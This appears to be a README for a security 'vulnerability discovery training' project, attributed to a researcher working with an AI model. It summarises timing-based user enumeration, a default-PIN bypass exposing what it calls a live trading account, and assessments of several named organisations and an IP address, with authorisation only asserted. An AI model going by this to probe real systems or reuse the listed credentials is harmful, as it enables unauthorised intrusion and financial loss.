Share
## https://sploitus.com/exploit?id=F7DCC272-C68B-5B52-85D0-A0DF46F665BC
# Vulnerability Discovery Training (VDT)
Training data for advanced vulnerability discovery - focusing on hard-to-detect attack vectors that require custom tooling, timing analysis, and non-standard approaches.
## Overview
This repository documents a systematic vulnerability discovery training program designed to teach:
- **Custom tool development** for measurement-based attacks
- **Timing attack** methodology and statistical analysis
- **Side-channel exploitation** beyond standard CVE scanning
- **Systematic enumeration** when standard exploits fail
## Structure
```
VDT/
โโโ findings/ # Assessment reports per target
โโโ tools/ # Custom exploitation tools
โโโ methodology/ # Documented techniques and insights
โโโ targets/ # Target metadata and context
```
## Training Methodology
### Assessment Flow
1. **Reconnaissance** - Port scan, service fingerprinting, technology stack
2. **Standard Exploitation** - Test common vulnerabilities (SQLi, XSS, IDOR, default creds)
3. **Custom Tooling** - When standard fails, build measurement tools
4. **Side-Channel Analysis** - Timing attacks, error differentials, statistical analysis
5. **Verification** - Prove exploitability with minimal impact
### Key Principle
> "When 100+ standard attack vectors fail, the vulnerability often requires custom measurement tooling. Timing differentials, error message analysis, and statistical correlation reveal what scanners miss."
## Notable Findings
### TrustPoint CRM - User Enumeration via Timing Attack (CVSS 7.5)
- **Challenge**: 2+ hours testing 100+ standard vectors with no findings
- **Breakthrough**: Custom Python timing tool revealed 200ms differential
- **Technique**: Statistical analysis over 5 iterations per email
- **Result**: 4 valid accounts identified (admin@default.com, demo@default.com, test@default.com, user@default.com)
- **Tool**: `tools/trustpoint_bypass.py`
### MEIC Capital - Default PIN Authentication Bypass (CVSS 9.8)
- **Finding**: Default PIN "1234" grants full access
- **Impact**: Live $16K IBKR trading account exposed
- **Technique**: Standard default credential testing
### Tufts Genomics - INCOMPLETE
- **Status**: Vulnerability confirmed by instructor but not found
- **Tested**: 50+ attack vectors across Rails 3 / Apache 2.2.34 / Phusion Passenger 3.0.18
- **Platform**: MPS LIMS (Laboratory Information Management System)
- **Challenge**: Authentication boundary holds against all standard and many custom attacks
## Tools Developed
### Timing Attack Framework
- `trustpoint_bypass.py` - Statistical timing analysis for user enumeration
- Measures response time deltas to identify valid vs invalid authentication attempts
- Configurable iteration count for statistical confidence
### Testing Scripts
- Multiple target-specific enumeration and exploitation scripts
- Parameter pollution testing
- Session manipulation attempts
- Format-based bypass testing
## Learning Outcomes
1. **Patience** - Some vulnerabilities require hours of systematic testing
2. **Measurement** - Build tools to measure what scanners don't see
3. **Statistics** - Side-channel attacks need multiple samples for confidence
4. **Creativity** - Standard CVE scanning misses entire vulnerability classes
## Targets Assessed
| Target | Status | CVSS | Finding Type |
|--------|--------|------|--------------|
| TrustPoint CRM | Complete | 7.5 | Timing-based user enumeration |
| MEIC Capital | Complete | 9.8 | Default credential bypass |
| B2B Bank | Complete | None | Enterprise hardened (no findings) |
| ESRI GNSS | Complete | Low | Outdated software (public data) |
| CPPLUS NVR | Complete | None | Well-secured IoT |
| Tufts Genomics | Incomplete | Unknown | Auth boundary held |
| 137.189.174.205 | Offline | N/A | Target unreachable |
## Attribution
**Researcher**: Nicholas Kloster + Claude Sonnet 4.5
**Organization**: NuClide Research
**Date**: July 2026
**Purpose**: Security research training and methodology development
## Ethics
All testing conducted on targets provided by instructor. No unauthorized access. No data exfiltration beyond proof of exploitability. Assessment stopped at proof-of-concept stage.